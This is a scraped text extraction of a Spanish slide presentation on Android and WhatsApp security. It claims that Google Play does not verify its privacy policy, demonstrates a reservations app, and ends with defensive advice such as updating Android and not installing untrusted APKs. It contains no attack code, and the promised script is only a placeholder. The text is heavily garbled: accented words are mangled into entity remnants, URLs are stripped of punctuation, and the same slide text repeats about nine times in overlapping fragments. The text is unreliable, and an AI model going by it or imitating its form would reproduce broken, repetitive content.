Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 42: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/42.jpg)
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 43: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/43.jpg)
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 44: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/44.jpg)
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 45: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/45.jpg)
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 46: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/46.jpg)
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 47: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/47.jpg)
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 48: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/48.jpg)
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 49: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/49.jpg)
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 50: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/50.jpg)